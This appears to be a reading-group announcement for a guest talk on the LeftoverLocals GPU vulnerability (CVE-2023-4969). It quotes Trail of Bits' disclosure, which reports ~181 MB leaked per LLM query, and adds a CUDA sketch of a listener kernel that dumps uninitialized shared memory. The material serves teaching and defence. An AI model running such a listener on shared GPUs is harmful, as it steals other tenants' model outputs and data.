
Guest Adelin Travers Presents: LeftoverLocals: Listening to LLM Responses Through Leaked GPU Local Memory

As big labs become more aware of the safety (and business) implications of model weights leaking to bad actors, there has been renewed interest in cybersecurity and operational security in the safety community. Last December we discussed Anthropic’s Responsible Scaling Policy, which included cybersec / opsec recommendations we described as “things smart people who don’t know about cybersec / opsec would recommend”. Perhaps we should engage more closely with the cybersecurity community!

To that end, this week we have invited Adelin Travers as a guest speaker. Adelin works with the team at Trail of Bits that recently uncovered an important vulnerability (LeftoverLocals) affecting GPUs used in ML systems. Their original blog post was also covered by Wired just a few weeks ago, on January 16th.

During the session, Adelin will give an overview of the intricate tech stack behind modern machine learning, making clear the extent of the attack surface. He'll explain the LeftoverLocals vulnerability and its implications for users and developers of AI services. We'll discuss where LeftoverLocals sits in the broader landscape of vulnerabilities, and what the appropriate level of worry is. We'll also discuss what practices organizations can adopt to insulate themselves against LeftoverLocals and other vulnerabilities of its kind.

LeftoverLocals can leak ~5.5 MB per GPU invocation on an AMD Radeon RX 7900 XT which, when running a 7B model on llama.cpp, adds up to ~181 MB for each LLM query. This is enough information to reconstruct the LLM response with high precision. The vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.

This vulnerability is tracked by CVE-2023-4969. It was discovered by Tyler Sorensen as part of his work within the ML/AI Assurance team. Tyler Sorensen is also an assistant professor at UCSC. Since September 2023, we have been working with CERT Coordination Center on a large coordinated disclosure effort involving all major GPU vendors, including: NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination.

—Sorensen and Khlaaf. “LeftoverLocals: Listening to LLM responses through leaked GPU local memory”. Trail of Bits, January 2024.
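To make the quoted mechanism concrete, here is a minimal conceptual sketch of the "listener" side of a LeftoverLocals-style attack: a kernel that declares a local-memory region, never writes to it, and dumps whatever values it finds into a global buffer for the host to inspect. It is written in CUDA syntax purely for illustration; the published research used other GPU programming frameworks, NVIDIA GPUs were not reported as affected, and the buffer size and kernel names here are our own assumptions, not the researchers' proof of concept.

```cuda
// Illustrative sketch only (assumed names/sizes): a "listener" kernel that
// reads uninitialized local (shared) memory and copies it out. On a
// vulnerable GPU, this region could still contain data left behind by a
// previous kernel, e.g. fragments of another process's LLM activations.
#include <cstdio>
#include <vector>

constexpr int LOCAL_WORDS = 4096;  // assumed size of the region to dump

__global__ void listener(unsigned int *out) {
    // Local memory is never initialized by this kernel.
    __shared__ unsigned int local_mem[LOCAL_WORDS];

    // Each thread copies its slice of local memory to global memory
    // without ever writing to it first.
    for (int i = threadIdx.x; i < LOCAL_WORDS; i += blockDim.x) {
        out[blockIdx.x * LOCAL_WORDS + i] = local_mem[i];
    }
}

int main() {
    const int blocks = 32;    // one dump per block
    const int threads = 256;

    unsigned int *d_out = nullptr;
    cudaMalloc(&d_out, blocks * LOCAL_WORDS * sizeof(unsigned int));

    listener<<<blocks, threads>>>(d_out);
    cudaDeviceSynchronize();

    std::vector<unsigned int> dump(blocks * LOCAL_WORDS);
    cudaMemcpy(dump.data(), d_out, dump.size() * sizeof(unsigned int),
               cudaMemcpyDeviceToHost);
    cudaFree(d_out);

    // On an affected GPU, non-zero words here would be leaked data; repeating
    // this across many kernel invocations is how the per-query megabytes
    // described above would accumulate.
    size_t nonzero = 0;
    for (unsigned int w : dump) nonzero += (w != 0);
    printf("non-zero words recovered: %zu of %zu\n", nonzero, dump.size());
    return 0;
}
```

The point of the sketch is simply that the attacker needs no special privileges: any code able to launch a GPU kernel on a co-resident device can read what an earlier kernel left in local memory, which is why the quoted passage frames this as an issue for anyone sharing GPUs across tenants or applications.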
